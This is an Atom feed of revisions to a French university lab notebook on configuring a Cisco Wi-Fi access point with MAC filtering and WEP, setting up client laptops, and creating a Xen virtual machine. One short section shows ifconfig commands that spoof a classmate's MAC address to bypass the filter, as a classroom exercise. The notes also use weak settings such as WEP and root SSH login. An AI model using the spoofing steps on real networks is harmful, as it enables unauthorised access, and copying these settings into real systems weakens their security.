		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23033"/>
				<updated>2015-11-19T10:31:03Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Système &amp;amp; Réseaux : S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Filtrage par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, chaque élève a son propre PC avec une adresse mac unique.&lt;br /&gt;
Ci dessous l'adresse Mac de chaque PC &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;RElax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:c4&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;papi&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:2d:fb&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour la récupération de l'adresse mac, il suffit d’exécuter la commande suivante : &lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
&lt;br /&gt;
Le résultat ressemble au suivant :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr f0:de:f1:07:29:e3  &lt;br /&gt;
          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;br /&gt;
          Interrupt:20 Memory:f2500000-f2520000 &lt;br /&gt;
&lt;br /&gt;
lo        Link encap:Local Loopback  &lt;br /&gt;
          inet addr:127.0.0.1  Mask:255.0.0.0&lt;br /&gt;
          inet6 addr: ::1/128 Scope:Host&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:207001 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:207001 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:0 &lt;br /&gt;
          RX bytes:19842913 (19.8 MB)  TX bytes:19842913 (19.8 MB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:27:10:44:fd:40  &lt;br /&gt;
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:227:10ff:fe44:fd40/64 Scope:Global&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:902f:3b4d:9e94:400c/64 Scope:Global&lt;br /&gt;
          inet6 addr: fe80::227:10ff:fe44:fd40/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12617493 errors:0 dropped:3 overruns:0 frame:0&lt;br /&gt;
          TX packets:4311500 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:17440919166 (17.4 GB)  TX bytes:545660742 (545.6 MB)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans un premier temps, il nous faut programmer le point cisco par le biais d'une connection série.&lt;br /&gt;
Après avoir branché le point d’accès en mode série, on se met en mode root et on lance le programme Minicom&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth05:~$ su&lt;br /&gt;
pifou@zabeth05:~$ minicom&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
une fois l'accés au point wifi est réalisé, on accède à sa configuration global : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on configure notre point d'accés afin qu'il autorise l'accés a certaine adresse mac et bloque le reste/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;              &lt;br /&gt;
ap(config)#access-list 701 permit  00015.afe6.edb3  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edc4  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.2dfb  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois l’accès par adresse Mac est configuré, on passe ensuite par la configuration du SSID&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T1&lt;br /&gt;
ap(config-ssid)#dot11 ssid T1 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ceci nous permet de definir le nom du Wifi qui est : T1.&lt;br /&gt;
Ensuite on déclare notre wifi sur l'une des interfaceRadio du point d’accès : on choisit l'interface &amp;quot;dot11Radio0&amp;quot;.&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid T1&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 ????????? transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Le réseau est crypté par une clé wep, et ensuite lancé une fois le point d’accès est allumé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;3) Configuration des eeePC &amp;lt;/h4&amp;gt;&lt;br /&gt;
Chaque PC doit se connecter automatiquement une fois allumé, pour cela il faut modifier le fichier : /etc/network/interfaces et y mettre les informations suivants :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key ??????????&lt;br /&gt;
	address 172.26.79.66&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte ces modification il faut redémarrer la carte wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifdow wlan0&lt;br /&gt;
ifup wlan0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Intrusion par Adresse Mac &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on cassera la sécurité Wifi, pour cela il faut juste changer l’adresse Mac de notre PC :&lt;br /&gt;
Pour cela, on utilise les lignes de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
ifconfig wlan0 hw ether 00:15:af:e7:2d:fb  (PC d' Eric)&lt;br /&gt;
ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, on s'occupera de la création de la machine virtuel :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net // pour se connecter au serveur hébergeant nos machines virtuels &lt;br /&gt;
xen-create-image --hostname dragon --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Après l'installation de la machine virtuel, qhelques changements sont obligatoires :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// autoriser l'access root  &lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
// dessinstaller les packets network-manager systemd&lt;br /&gt;
apt-get purge network-manager systemd&lt;br /&gt;
// pour passer via le lien ssh au lieu du lien série&lt;br /&gt;
init tab ==&amp;gt; sur la ligne 45 on change le tty1 par hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la configuration de notre machine virtuel, il faudra retenir : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvirir la machine pour la première fois ou après l'avoir éteinte  : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
Pour l'ouverture d'une machine virtuel on utilise la commande: xl console Werewolf&lt;br /&gt;
Pour eteindre la machine on utilise la comande : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=22757</id>
		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=22757"/>
				<updated>2015-11-05T20:12:43Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Système &amp;amp; Réseaux : S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Filtrage par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, chaque élève a son propre PC avec une adresse mac unique.&lt;br /&gt;
Ci dessous l'adresse Mac de chaque PC &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;RElax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:c4&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;papi&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:2d:fb&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour la récupération de l'adresse mac, il suffit d’exécuter la commande suivante : &lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
&lt;br /&gt;
Le résultat ressemble au suivant :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr f0:de:f1:07:29:e3  &lt;br /&gt;
          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;br /&gt;
          Interrupt:20 Memory:f2500000-f2520000 &lt;br /&gt;
&lt;br /&gt;
lo        Link encap:Local Loopback  &lt;br /&gt;
          inet addr:127.0.0.1  Mask:255.0.0.0&lt;br /&gt;
          inet6 addr: ::1/128 Scope:Host&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:207001 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:207001 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:0 &lt;br /&gt;
          RX bytes:19842913 (19.8 MB)  TX bytes:19842913 (19.8 MB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:27:10:44:fd:40  &lt;br /&gt;
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:227:10ff:fe44:fd40/64 Scope:Global&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:902f:3b4d:9e94:400c/64 Scope:Global&lt;br /&gt;
          inet6 addr: fe80::227:10ff:fe44:fd40/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12617493 errors:0 dropped:3 overruns:0 frame:0&lt;br /&gt;
          TX packets:4311500 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:17440919166 (17.4 GB)  TX bytes:545660742 (545.6 MB)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans un premier temps, il nous faut programmer le point cisco par le biais d'une connection série.&lt;br /&gt;
Après avoir branché le point d’accès en mode série, on se met en mode root et on lance le programme Minicom&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth05:~$ su&lt;br /&gt;
pifou@zabeth05:~$ minicom&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
une fois l'accés au point wifi est réalisé, on accède à sa configuration global : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on configure notre point d'accés afin qu'il autorise l'accés a certaine adresse mac et bloque le reste/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;              &lt;br /&gt;
ap(config)#access-list 701 permit  00015.afe6.edb3  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edc4  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.2dfb  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois l’accès par adresse Mac est configuré, on passe ensuite par la configuration du SSID&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T1&lt;br /&gt;
ap(config-ssid)#dot11 ssid T1 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ceci nous permet de definir le nom du Wifi qui est : T1.&lt;br /&gt;
Ensuite on déclare notre wifi sur l'une des interfaceRadio du point d’accès : on choisit l'interface &amp;quot;dot11Radio0&amp;quot;.&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid T1&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 ????????? transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Le réseau est crypté par une clé wep, et ensuite lancé une fois le point d’accès est allumé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;3) Configuration des eeePC &amp;lt;/h4&amp;gt;&lt;br /&gt;
Chaque PC doit se connecter automatiquement une fois allumé, pour cela il faut modifier le fichier : /etc/network/interfaces et y mettre les informations suivants :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key ??????????&lt;br /&gt;
	address 172.26.79.66&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte ces modification il faut redémarrer la carte wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifdow wlan0&lt;br /&gt;
ifup wlan0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=22495</id>
		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=22495"/>
				<updated>2015-10-27T11:20:11Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : Page créée avec «  RElax : 0015.afe6.edb3  Puduc : 00:15:af:e6:ed:c4  papi  : 0015.afe7.2dfb »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; RElax : 0015.afe6.edb3&lt;br /&gt;
 Puduc : 00:15:af:e6:ed:c4&lt;br /&gt;
 papi  : 0015.afe7.2dfb&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016&amp;diff=22494</id>
		<title>TP sysres IMA2a5 2015/2016</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016&amp;diff=22494"/>
				<updated>2015-10-27T11:15:31Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Merci de référencer votre cahier de travaux pratiques ici.&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Cahier&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Tâche particulière&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G1 | Cahier groupe n°1]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Clément Millet&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Configuration routeur&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G2 | Cahier groupe n°2]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Gauthier Ryckeboer&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Configuration commutateur&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G3 | Cahier groupe n°3]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Maxime Strunc&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Point d'accès Wifi&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G4 | Cahier groupe n°4]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Marouane ACHKRA&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Point d'accès Wifi&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G5 | Cahier groupe n°5]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nicolas Gunst &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; configuration EtherChannel&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G6 | Cahier groupe n°6]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Eric Bourre&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Configuration routeur&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G7 | Cahier groupe n°7]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	</feed>